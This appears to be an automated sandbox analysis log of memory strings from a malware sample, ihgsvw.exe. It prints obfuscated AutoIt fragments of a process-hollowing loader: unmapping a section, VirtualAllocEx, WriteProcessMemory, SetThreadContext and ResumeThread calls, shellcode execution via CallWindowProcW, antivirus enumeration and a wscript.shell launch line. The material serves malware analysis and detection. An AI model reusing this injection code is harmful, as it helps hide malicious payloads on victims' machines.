      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bufferasmetptr
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: binbufferetptrac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: byte[uctcreatea7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c71deeb255419xi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kernel32.dll0xn
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: virtualallocex7xg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dword_ptr.x|
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _crypt_decryptdatad ad\xj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __crypt_refcountincsxc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __crypt_refcountecjx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _runbinary_fixreloc adax
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __crypt_refcountdecxx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: displayname
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _crypt_derivekeydx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %localappdata%\tempsk
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user~14 ad
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\syswow64w64
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9ea2beba94941
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %localappdata%\temp\k
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: majoroperatingsystemver
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: majorlinkerversionr<gj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: addressofnewexeheader3gc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9de1ec28a69*gx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: extendedregisters!gq
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: numberofsectionsaderxgv
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pointertosymboltable_go
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sizeofoptionalheader
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: flagsvg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: segfsig
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: seggsbg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: segds
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: edi@x
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: esi@_p
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: edxh~
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ecx3a
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: seges
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eflags
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: segss
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: segcs
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @_0fo
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: magic
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: spareh
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bool*
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mutantx
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msctfime ui
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `\[tp\[t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \[t][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ][t ][t0][t@][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s3tt!n
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryoihgsvw.exeder10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [i[pi
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif.n
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifzn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifpn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifin
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifon8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifbn;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endiffn_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wend-m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncym
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif_m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncrm
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncpm)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe1cc89e6f4a411499bfda1b69b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddressu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c80ff2bc5f51660df0cdd6p\b8;u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp6u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6!u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c\u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9da3df3a9426c6725af97e9387cwu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7cbu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eeab5f7c770ab29ce2277c}u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7chu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a068fa3ca0ecu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a0387b5d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f4d411094b2ca0e7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8bd6f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f4974479613eab97fd307c
